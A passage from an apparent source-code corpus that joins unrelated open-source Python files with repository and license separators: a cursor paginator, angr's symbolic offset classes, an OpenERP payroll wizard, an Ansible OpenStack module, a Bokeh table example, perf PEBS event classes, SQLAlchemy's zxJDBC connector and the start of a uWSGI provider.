            else:
                results = results.order_by('-%s' % self.key)

        if value:
            # Reuse any extra-select expression defined for the key so the
            # WHERE bound matches what is being sorted on.
            if self.key in results.query.extra:
                col_query, col_params = results.query.extra[self.key]
                col_params = col_params[:]
            else:
                col_query, col_params = quote_name(self.key), []

            col_params.append(value)
            if asc:
                results = results.extra(
                    where=['%s >= %%s' % (col_query,)],
                    params=col_params,
                )
            else:
                results = results.extra(
                    where=['%s <= %%s' % (col_query,)],
                    params=col_params,
                )

        return results

    def get_result(self, limit=100, cursor=None):
        """Fetch one page of results and build the next/prev cursors."""
        # cursors are:
        #   (identifier(integer), row offset, is_prev)
        if cursor is None:
            cursor = Cursor(0, 0, 0)

        if cursor.value:
            cursor_value = self._value_from_cursor(cursor)
        else:
            cursor_value = 0

        queryset = self._get_results_from_qs(cursor_value, cursor.is_prev)

        # this effectively gets us the before post, and the current (after) post
        # every time
        if cursor.is_prev:
            stop = cursor.offset + limit + 2
        else:
            stop = cursor.offset + limit + 1

        results = list(queryset[cursor.offset:stop])

        if cursor.is_prev:
            # Drop the sentinel row and restore the requested order.
            results = results[1:][::-1]

        return build_cursor(
            results=results,
            limit=limit,
            cursor=cursor,
            key=self._get_item_key,
        )
class DateTimePaginator(Paginator):
    """Paginator for querysets ordered by a datetime column; cursor
    values are unix timestamps."""

    def _get_item_key(self, item):
        value = getattr(item, self.key)
        # NOTE(review): '%s' is a platform-specific strftime extension
        # (glibc; unavailable e.g. on Windows) and formats in local time.
        # Confirm stored values round-trip with _value_from_cursor below,
        # which decodes as UTC.
        value = int(value.strftime('%s'))
        if self.desc:
            return math.ceil(value)
        return math.floor(value)

    def _value_from_cursor(self, cursor):
        # Inverse of _get_item_key: timestamp -> timezone-aware datetime.
        return datetime.fromtimestamp(cursor.value).replace(tzinfo=timezone.utc)
| bsd-3-clause |
schieb/angr | angr/engines/light/data.py | 1 | 16519 |
import ailment
from ...utils.constants import is_alignment_mask
class ArithmeticExpression:
    """A lightweight symbolic binary arithmetic node: an operator tag
    (`op`) plus a 2-tuple of operands (ints, ailment Consts, or nested
    expressions).

    The arithmetic dunders fold a constant right-hand side into whichever
    operand is already concrete when possible; otherwise they build a new
    node from (self, other).

    NOTE(review): the folding rules push `other` into a single operand
    without regard to `self.op`, which is only algebraically sound for
    some operator combinations; that behavior is preserved unchanged --
    confirm upstream intent.  Some methods test `is int` while others
    test membership in CONST_TYPES; also preserved as-is.
    """

    # Operator tags (bit-flag style values).
    Add = 0
    Sub = 1
    Or = 2
    And = 4
    RShift = 8
    LShift = 16
    Mul = 32
    Xor = 64

    # Operand types treated as foldable constants.
    CONST_TYPES = (int, ailment.expression.Const)

    __slots__ = ('op', 'operands', )

    def __init__(self, op, operands):
        self.op = op
        self.operands = operands

    def __repr__(self):
        if self.op == ArithmeticExpression.Add:
            return "%s + %s" % self.operands
        elif self.op == ArithmeticExpression.Sub:
            return "%s - %s" % self.operands
        elif self.op == ArithmeticExpression.And:
            return "%s & %s" % self.operands
        elif self.op == ArithmeticExpression.Or:
            return "%s | %s" % self.operands
        elif self.op == ArithmeticExpression.RShift:
            return "%s >> %s" % self.operands
        elif self.op == ArithmeticExpression.LShift:
            return "%s << %s" % self.operands
        elif self.op == ArithmeticExpression.Mul:
            return "%s * %s" % self.operands
        elif self.op == ArithmeticExpression.Xor:
            # FIX: Xor previously fell through to "Unsupported op".
            return "%s ^ %s" % self.operands
        else:
            return "Unsupported op %s" % self.op

    def __add__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
                return ArithmeticExpression(self.op, (self.operands[0] + other, self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] + other,))
        return ArithmeticExpression(self.op, (self, other, ))

    def __sub__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) is int:
                return ArithmeticExpression(self.op, (self.operands[0] - other, self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] - other,))
        return ArithmeticExpression(self.op, (self, other, ))

    def __rsub__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) is int:
                # FIX: was `other - (self.operands[0], self.operands[1],)`
                # which subtracts a tuple from a number and raises
                # TypeError; fold the constant into the first operand.
                return ArithmeticExpression(self.op, (other - self.operands[0], self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], other - self.operands[1],))
        return ArithmeticExpression(self.op, (self, other, ))

    def __and__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) is int:
                return ArithmeticExpression(self.op, (self.operands[0] & other, self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] & other,))
        return ArithmeticExpression(self.op, (self, other, ))

    def __or__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) is int:
                return ArithmeticExpression(self.op, (self.operands[0] | other, self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] | other,))
        return ArithmeticExpression(self.op, (self, other, ))

    def __xor__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) is int:
                return ArithmeticExpression(self.op, (self.operands[0] ^ other, self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] ^ other,))
        return ArithmeticExpression(self.op, (self, other, ))

    def __lshift__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
                return ArithmeticExpression(self.op, (self.operands[0] << other, self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] << other,))
        return ArithmeticExpression(self.op, (self, other, ))

    def __rlshift__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
                return ArithmeticExpression(self.op, (other << self.operands[0], self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], other << self.operands[1],))
        return ArithmeticExpression(self.op, ( other, self, ))

    def __rrshift__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
                return ArithmeticExpression(self.op, (other >> self.operands[0], self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], other >> self.operands[1],))
        return ArithmeticExpression(self.op, ( other, self, ))

    def __rshift__(self, other):
        if type(other) in ArithmeticExpression.CONST_TYPES:
            other = self._unpack_const(other)
            if type(self.operands[0]) in ArithmeticExpression.CONST_TYPES:
                return ArithmeticExpression(self.op, (self.operands[0] >> other, self.operands[1], ))
            elif type(self.operands[1]) is int:
                return ArithmeticExpression(self.op, (self.operands[0], self.operands[1] >> other,))
        return ArithmeticExpression(self.op, (self, other, ))

    @staticmethod
    def _unpack_const(expr):
        """Return the int value of *expr* (an int or ailment Const);
        raise NotImplementedError for anything else."""
        if type(expr) is int:
            return expr
        elif type(expr) is ailment.expression.Const:
            return expr.value
        raise NotImplementedError("Unsupported const expression type %s." % type(expr))

    @staticmethod
    def try_unpack_const(expr):
        """Best-effort _unpack_const: return *expr* unchanged when it is
        not a recognized constant."""
        try:
            return ArithmeticExpression._unpack_const(expr)
        except NotImplementedError:
            return expr
class RegisterOffset:
    """A register plus an offset, e.g. "rax+8".

    `offset` is either a plain int (concrete) or a symbolic expression
    (typically an ArithmeticExpression).  Arithmetic operators return new
    RegisterOffset instances; concrete results are wrapped into the
    signed range of `bits` via _to_signed.
    """

    __slots__ = ('_bits', 'reg', 'offset', )

    def __init__(self, bits, reg, offset):
        self._bits = bits
        self.reg = reg
        self.offset = offset

    @property
    def bits(self):
        # Width in bits used for signed wrap-around of concrete offsets.
        return self._bits

    @property
    def symbolic(self):
        # Concrete offsets are plain ints; anything else is symbolic.
        return type(self.offset) is not int

    def __repr__(self):
        if type(self.offset) is int:
            offset_str = '' if self.offset == 0 else "%+x" % self.offset
        else:
            offset_str = str(self.offset)
        return "%s%s" % (self.reg, offset_str)

    def __add__(self, other):
        if not self.symbolic and type(other) is int:
            # Keep things in concrete
            return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset + other))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset + other)
            else:
                # Convert to symbolic
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.Add, (self.offset, other, )))

    def __radd__(self, other):
        return self.__add__(other)

    def __sub__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset - other))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset - other)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.Sub, (self.offset, other,)))

    def __rsub__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(other - self.offset))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, other - self.offset)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.Sub, (other, self.offset, )))

    def __mul__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset * other))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset * other)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.Mul, (self.offset, other, )))

    def __rmul__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(other * self.offset))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset * other)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.Mul, (other, self.offset, )))

    def __and__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset & other))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset & other)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.And, (self.offset, other,)))

    def __rand__(self, other):
        return self.__and__(other)

    def __or__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset | other))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset | other)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.Or, (self.offset, other,)))

    def __ror__(self, other):
        return self.__or__(other)

    def __xor__(self, other):
        if not self.symbolic and type(other) is int:
            # FIX: this concrete path previously computed `self.offset | other`
            # (bitwise OR), disagreeing with the symbolic Xor paths below.
            return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset ^ other))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset ^ other)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.Xor, (self.offset, other,)))

    def __rxor__(self, other):
        return self.__xor__(other)

    def __rshift__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset >> other))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset >> other)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.RShift, (self.offset, other,)))

    def __rrshift__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(other >> self.offset))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, other >> self.offset)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.RShift, (other, self.offset,)))

    def __lshift__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(self.offset << other))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, self.offset << other)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.LShift, (self.offset, other,)))

    def __rlshift__(self, other):
        if not self.symbolic and type(other) is int:
            return RegisterOffset(self._bits, self.reg, self._to_signed(other << self.offset))
        else:
            if self.symbolic:
                return RegisterOffset(self._bits, self.reg, other << self.offset)
            else:
                return RegisterOffset(self._bits, self.reg,
                                      ArithmeticExpression(ArithmeticExpression.LShift, (other, self.offset,)))

    def __neg__(self):
        if not self.symbolic:
            return RegisterOffset(self._bits, self.reg, self._to_signed(-self.offset))
        else:
            return RegisterOffset(self._bits, self.reg, -self.offset)

    def __invert__(self):
        if not self.symbolic:
            return RegisterOffset(self._bits, self.reg, self._to_signed(~self.offset))
        else:
            return RegisterOffset(self._bits, self.reg, ~self.offset)

    def _to_signed(self, n):
        """Wrap *n* into the signed two's-complement range of self._bits.

        NOTE(review): assumes n is already within [-2**bits, 2**bits);
        larger magnitudes are not masked first -- preserved as-is.
        """
        if n >= 2 ** (self._bits - 1):
            return n - 2 ** self._bits
        return n
class SpOffset(RegisterOffset):
    """A stack-pointer-relative offset.  `is_base` marks the offset as
    anchored to the base pointer (rendered "BP") instead of "SP"."""

    __slots__ = ('is_base', )

    def __init__(self, bits, offset, is_base=False):
        super(SpOffset, self).__init__(bits, 'sp', offset)
        self.is_base = is_base

    def __repr__(self):
        if type(self.offset) is int:
            offset_str = '' if self.offset == 0 else "%+x" % self.offset
        else:
            offset_str = str(self.offset)
        return "%s%s" % ('BP' if self.is_base else 'SP', offset_str)

    def __add__(self, other):
        # NOTE(review): results drop is_base (it defaults to False) --
        # confirm arithmetic on BP-anchored offsets is meant to rebase.
        other = ArithmeticExpression.try_unpack_const(other)
        if not self.symbolic and type(other) is int:
            return SpOffset(self._bits, self._to_signed(self.offset + other))
        else:
            if self.symbolic:
                return SpOffset(self._bits, self.offset + other)
            else:
                return SpOffset(self._bits, ArithmeticExpression(ArithmeticExpression.Add, (self.offset, other, )))

    def __sub__(self, other):
        # See __add__ regarding is_base being dropped on the result.
        other = ArithmeticExpression.try_unpack_const(other)
        if not self.symbolic and type(other) is int:
            return SpOffset(self._bits, self._to_signed(self.offset - other))
        else:
            if self.symbolic:
                return SpOffset(self._bits, self.offset - other)
            else:
                return SpOffset(self._bits, ArithmeticExpression(ArithmeticExpression.Sub, (self.offset, other, )))

    def __and__(self, other):
        other = ArithmeticExpression.try_unpack_const(other)
        if is_alignment_mask(other):
            # stack pointer alignment. ignore it.
            return SpOffset(self._bits, self.offset)
        else:
            return SpOffset(self._bits, ArithmeticExpression(ArithmeticExpression.And, (self, other, )))

    def __eq__(self, other):
        # Equality requires matching width, register, offset and is_base.
        return type(other) is SpOffset and self._bits == other.bits and self.reg == other.reg and \
            self.offset == other.offset and self.is_base is other.is_base

    def __hash__(self):
        return hash((self._bits, self.reg, self.offset, self.is_base))

    def __lt__(self, other):
        # Orderable only against other SpOffsets on the same register.
        if type(other) is not SpOffset or self.reg != other.reg:
            return NotImplemented
        return self.offset < other.offset

    def __gt__(self, other):
        if type(other) is not SpOffset or self.reg != other.reg:
            return NotImplemented
        return self.offset > other.offset
henrytao-me/openerp.positionq | openerp/addons/l10n_in_hr_payroll/wizard/hr_salary_employee_bymonth.py | 51 | 2829 | #-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP SA (<http://openerp.com>). All Rights Reserved
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class hr_salary_employee_bymonth(osv.osv_memory):
    # Transient (in-memory) wizard model collecting parameters for the
    # "salary by employee and month" report.

    _name = 'hr.salary.employee.month'
    _description = 'Hr Salary Employee By Month Report'

    # Wizard fields shown in the report dialog.
    _columns = {
        'start_date': fields.date('Start Date', required=True),
        'end_date': fields.date('End Date', required=True),
        'employee_ids': fields.many2many('hr.employee', 'payroll_year_rel', 'payroll_year_id', 'employee_id', 'Employees', required=True),
        'category_id': fields.many2one('hr.salary.rule.category', 'Category', required=True),
    }

    def _get_default_category(self, cr, uid, context=None):
        # Default to the 'NET' salary rule category when one exists.
        category_ids = self.pool.get('hr.salary.rule.category').search(cr, uid, [('code', '=', 'NET')], context=context)
        return category_ids and category_ids[0] or False

    _defaults = {
        # January 1st of the current year through today.
        'start_date': lambda *a: time.strftime('%Y-01-01'),
        'end_date': lambda *a: time.strftime('%Y-%m-%d'),
        'category_id': _get_default_category
    }

    def print_report(self, cr, uid, ids, context=None):
        """
        To get the date and print the report
        @param self: The object pointer.
        @param cr: A database cursor
        @param uid: ID of the user currently logged in
        @param context: A standard dictionary
        @return: return report
        """
        if context is None:
            context = {}
        # Pass the wizard's field values to the report engine as 'form'.
        datas = {'ids': context.get('active_ids', [])}
        res = self.read(cr, uid, ids, context=context)
        res = res and res[0] or {}
        datas.update({'form': res})
        return {
            'type': 'ir.actions.report.xml',
            'report_name': 'salary.employee.bymonth',
            'datas': datas,
        }

# Instantiate to register the model with the ORM (pre-v7 OpenERP idiom).
hr_salary_employee_bymonth()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
ToBeReplaced/ansible-modules-core | cloud/openstack/os_client_config.py | 8 | 1787 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import os_client_config
from os_client_config import exceptions
DOCUMENTATION = '''
---
module: os_client_config
short_description: Get OpenStack Client config
description:
- Get I(openstack) client config data from clouds.yaml or environment
version_added: "2.0"
requirements: [ os-client-config ]
author: "Monty Taylor (@emonty)"
'''
EXAMPLES = '''
# Get list of clouds that do not support security groups
- os-client-config:
- debug: var={{ item }}
with_items: "{{ openstack.clouds|rejectattr('secgroup_source', 'none')|list() }}"
'''
def main():
    """Collect os-client-config cloud configurations and return them as
    the `openstack.clouds` Ansible fact.

    Exits via module.exit_json on success, or module.fail_json when
    os-client-config cannot parse the configuration.
    """
    # No options: this module only reads clouds.yaml / the environment.
    # (The unused `p = module.params` local was removed.)
    module = AnsibleModule({})
    try:
        config = os_client_config.OpenStackConfig()
        clouds = []
        for cloud in config.get_all_clouds():
            # Expose each cloud's name inside its own config dict.
            cloud.config['name'] = cloud.name
            clouds.append(cloud.config)
        module.exit_json(ansible_facts=dict(openstack=dict(clouds=clouds)))
    except exceptions.OpenStackConfigException as e:
        module.fail_json(msg=str(e))
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
roxyboy/bokeh | examples/glyphs/data_tables.py | 41 | 3178 | from bokeh.io import vplot
from bokeh.models import ColumnDataSource, DataRange1d, Plot, LinearAxis, Grid, Circle, HoverTool, BoxSelectTool
from bokeh.models.widgets import DataTable, TableColumn, StringFormatter, NumberFormatter, StringEditor, IntEditor, NumberEditor, SelectEditor
from bokeh.embed import file_html
from bokeh.resources import INLINE
from bokeh.browserlib import view
from bokeh.sampledata.autompg2 import autompg2 as mpg
# Single shared data source: edits in the table and selections in the plot
# stay in sync because both widgets reference the same ColumnDataSource.
source = ColumnDataSource(mpg)
# Distinct values for the dropdown (SelectEditor) columns.
manufacturers = sorted(mpg["manufacturer"].unique())
models = sorted(mpg["model"].unique())
transmissions = sorted(mpg["trans"].unique())
drives = sorted(mpg["drv"].unique())
classes = sorted(mpg["class"].unique())
# One TableColumn per displayed field; editors control in-place editing UI.
columns = [
    TableColumn(field="manufacturer", title="Manufacturer", editor=SelectEditor(options=manufacturers), formatter=StringFormatter(font_style="bold")),
    TableColumn(field="model", title="Model", editor=StringEditor(completions=models)),
    TableColumn(field="displ", title="Displacement", editor=NumberEditor(step=0.1), formatter=NumberFormatter(format="0.0")),
    TableColumn(field="year", title="Year", editor=IntEditor()),
    TableColumn(field="cyl", title="Cylinders", editor=IntEditor()),
    TableColumn(field="trans", title="Transmission", editor=SelectEditor(options=transmissions)),
    TableColumn(field="drv", title="Drive", editor=SelectEditor(options=drives)),
    TableColumn(field="class", title="Class", editor=SelectEditor(options=classes)),
    TableColumn(field="cty", title="City MPG", editor=IntEditor()),
    TableColumn(field="hwy", title="Highway MPG", editor=IntEditor()),
]
data_table = DataTable(source=source, columns=columns, editable=True)
plot = Plot(title=None, x_range= DataRange1d(), y_range=DataRange1d(), plot_width=1000, plot_height=300)
# Set up x & y axis
plot.add_layout(LinearAxis(), 'below')
yaxis = LinearAxis()
plot.add_layout(yaxis, 'left')
plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))
# Add Glyphs: one circle series for city MPG, one for highway MPG,
# both plotted against the row index.
cty_glyph = Circle(x="index", y="cty", fill_color="#396285", size=8, fill_alpha=0.5, line_alpha=0.5)
hwy_glyph = Circle(x="index", y="hwy", fill_color="#CE603D", size=8, fill_alpha=0.5, line_alpha=0.5)
cty = plot.add_glyph(source, cty_glyph)
hwy = plot.add_glyph(source, hwy_glyph)
# Add the tools: hover tooltips shared by both series, plus the
# series-specific MPG line appended per tool.
tooltips = [
    ("Manufacturer", "@manufacturer"),
    ("Model", "@model"),
    ("Displacement", "@displ"),
    ("Year", "@year"),
    ("Cylinders", "@cyl"),
    ("Transmission", "@trans"),
    ("Drive", "@drv"),
    ("Class", "@class"),
]
cty_hover_tool = HoverTool(renderers=[cty], tooltips=tooltips + [("City MPG", "@cty")])
hwy_hover_tool = HoverTool(renderers=[hwy], tooltips=tooltips + [("Highway MPG", "@hwy")])
select_tool = BoxSelectTool(renderers=[cty, hwy], dimensions=['width'])
plot.add_tools(cty_hover_tool, hwy_hover_tool, select_tool)
# Stack the plot above the table in a single vertical layout.
layout = vplot(plot, data_table)
if __name__ == "__main__":
    filename = "data_tables.html"
    with open(filename, "w") as f:
        f.write(file_html(layout, INLINE, "Data Tables"))
    print("Wrote %s" % filename)
    view(filename)
| bsd-3-clause |
viaembedded/arm-soc | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/EventClass.py | 4653 | 3596 | # EventClass.py
#
# This is a library defining some events types classes, which could
# be used by other scripts to analyzing the perf samples.
#
# Currently there are just a few classes defined for examples,
# PerfEvent is the base class for all perf event sample, PebsEvent
# is a HW base Intel x86 PEBS event, and user could add more SW/HW
# event classes based on requirements.
import struct
# Event types, user could add more here
# Event types, user could add more here
EVTYPE_GENERIC = 0
EVTYPE_PEBS = 1    # Basic PEBS event
EVTYPE_PEBS_LL = 2 # PEBS event with load latency info
EVTYPE_IBS = 3


def create_event(name, comm, dso, symbol, raw_buf):
    """Factory returning the most specific event class for a sample.

    There is currently no reliable marker for the event type, so the raw
    buffer size is used as a heuristic: a PEBS record with load-latency
    data is 176 bytes, a plain PEBS record is 144 bytes, and anything
    else is treated as a generic perf event.
    """
    size = len(raw_buf)
    if size == 144:
        return PebsEvent(name, comm, dso, symbol, raw_buf)
    if size == 176:
        return PebsNHM(name, comm, dso, symbol, raw_buf)
    return PerfEvent(name, comm, dso, symbol, raw_buf)
class PerfEvent(object):
    """Base class for all perf event samples.

    Stores the common sample attributes and counts how many events have
    been constructed in the class attribute ``event_num``.
    """

    # Running total of all PerfEvent (and subclass) instances created.
    event_num = 0

    def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_GENERIC):
        self.name = name
        self.comm = comm
        self.dso = dso
        self.symbol = symbol
        self.raw_buf = raw_buf
        self.ev_type = ev_type
        PerfEvent.event_num += 1

    def show(self):
        """Print a one-line summary of this sample."""
        # Parenthesized form prints identically under Python 2 (statement
        # with a single parenthesized expression) and Python 3 (function).
        print("PMU event: name=%12s, symbol=%24s, comm=%8s, dso=%12s" % (self.name, self.symbol, self.comm, self.dso))
#
# Basic Intel PEBS (Precise Event-based Sampling) event, whose raw buffer
# contains the context info when that event happened: the EFLAGS and
# linear IP info, as well as all the registers.
#
class PebsEvent(PerfEvent):
    """Basic Intel PEBS (Precise Event-based Sampling) event.

    The first 80 bytes of the raw buffer hold the context captured when
    the event fired: EFLAGS, the linear instruction pointer, and the
    general-purpose registers, each as a 64-bit little-endian value.
    """

    # Running total of PEBS events constructed.
    pebs_num = 0

    def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_PEBS):
        # Ten unsigned 64-bit fields packed back to back.
        (self.flags, self.ip,
         self.ax, self.bx, self.cx, self.dx,
         self.si, self.di, self.bp, self.sp) = struct.unpack('QQQQQQQQQQ', raw_buf[0:80])
        PerfEvent.__init__(self, name, comm, dso, symbol, raw_buf, ev_type)
        PebsEvent.pebs_num += 1
#
# Intel Nehalem and Westmere support PEBS plus Load Latency info which lie
# in the four 64 bit words write after the PEBS data:
# Status: records the IA32_PERF_GLOBAL_STATUS register value
# DLA: Data Linear Address (EIP)
# DSE: Data Source Encoding, where the latency happens, hit or miss
# in L1/L2/L3 or IO operations
# LAT: the actual latency in cycles
#
class PebsNHM(PebsEvent):
    """PEBS event with Nehalem/Westmere load-latency extension.

    Four extra 64-bit words follow the basic PEBS data at offset 144:
    Status (IA32_PERF_GLOBAL_STATUS), DLA (data linear address),
    DSE (data source encoding: where the latency occurred) and
    LAT (the measured latency in cycles).
    """

    # Running total of load-latency PEBS events constructed.
    pebs_nhm_num = 0

    def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_PEBS_LL):
        self.status, self.dla, self.dse, self.lat = struct.unpack('QQQQ', raw_buf[144:176])
        PebsEvent.__init__(self, name, comm, dso, symbol, raw_buf, ev_type)
        PebsNHM.pebs_nhm_num += 1
| gpl-2.0 |
jessekl/flixr | venv/lib/python2.7/site-packages/sqlalchemy/connectors/zxJDBC.py | 79 | 1882 | # connectors/zxJDBC.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import sys
from . import Connector
class ZxJDBCConnector(Connector):
    """Connector for zxJDBC, the JDBC DBAPI bridge available under Jython."""

    driver = 'zxjdbc'

    supports_sane_rowcount = False
    supports_sane_multi_rowcount = False

    supports_unicode_binds = True
    # Unicode statements require an interpreter newer than 2.5.0.  Compare
    # version_info tuples rather than the sys.version string: string
    # comparison is lexicographic, so e.g. '2.10...' sorts before '2.5...'.
    supports_unicode_statements = sys.version_info > (2, 5, 0)
    description_encoding = None
    default_paramstyle = 'qmark'

    # Filled in by dialect subclasses, e.g. jdbc_db_name='mysql'.
    jdbc_db_name = None
    jdbc_driver_name = None

    @classmethod
    def dbapi(cls):
        """Return the zxJDBC DBAPI module (importable only under Jython)."""
        from com.ziclix.python.sql import zxJDBC
        return zxJDBC

    def _driver_kwargs(self):
        """Return kw arg dict to be sent to connect()."""
        return {}

    def _create_jdbc_url(self, url):
        """Create a JDBC url from a :class:`~sqlalchemy.engine.url.URL`"""
        # Append ':<port>' only when a port was supplied.  A conditional
        # expression replaces the fragile ``cond and X or Y`` idiom.
        port = ':%s' % url.port if url.port is not None else ''
        return 'jdbc:%s://%s%s/%s' % (self.jdbc_db_name, url.host, port,
                                      url.database)

    def create_connect_args(self, url):
        """Build the [args, kwargs] pair handed to the DBAPI connect()."""
        opts = self._driver_kwargs()
        opts.update(url.query)
        return [
            [self._create_jdbc_url(url),
             url.username, url.password,
             self.jdbc_driver_name],
            opts]

    def is_disconnect(self, e, connection, cursor):
        """Return True if the error indicates the connection was dropped."""
        # Only ProgrammingError carries the closed-connection messages.
        if not isinstance(e, self.dbapi.ProgrammingError):
            return False
        e = str(e)
        return 'connection is closed' in e or 'cursor is closed' in e

    def _get_server_version_info(self, connection):
        # use connection.connection.dbversion, and parse appropriately
        # to get a tuple
        raise NotImplementedError()
| mit |
Sportamore/blues | blues/application/providers/uwsgi.py | 1 | 7446 | import os
from fabric.context_managers import settings
from fabric.state import env
from fabric.utils import indent, warn
from refabric.api import run, info
from refabric.context_managers import sudo, silent
from .base import ManagedProvider
from ..project import *
from ... import debian
from ...app import blueprint
class UWSGIProvider(ManagedProvider):
    """Application provider that deploys web/worker processes as uWSGI
    emperor vassals.  Each vassal is a rendered .ini template uploaded to
    the project's uwsgi.d directory on the remote host."""
    name = 'uwsgi'
    default_manager = 'noop'

    def install(self):
        """
        Install system wide uWSGI and upstart service.
        """
        from blues import uwsgi
        uwsgi.setup()

    def get_config_path(self):
        """
        Get or create uWSGI project vassals home dir.

        Uses the blueprint's ``emperor`` setting when it is a concrete
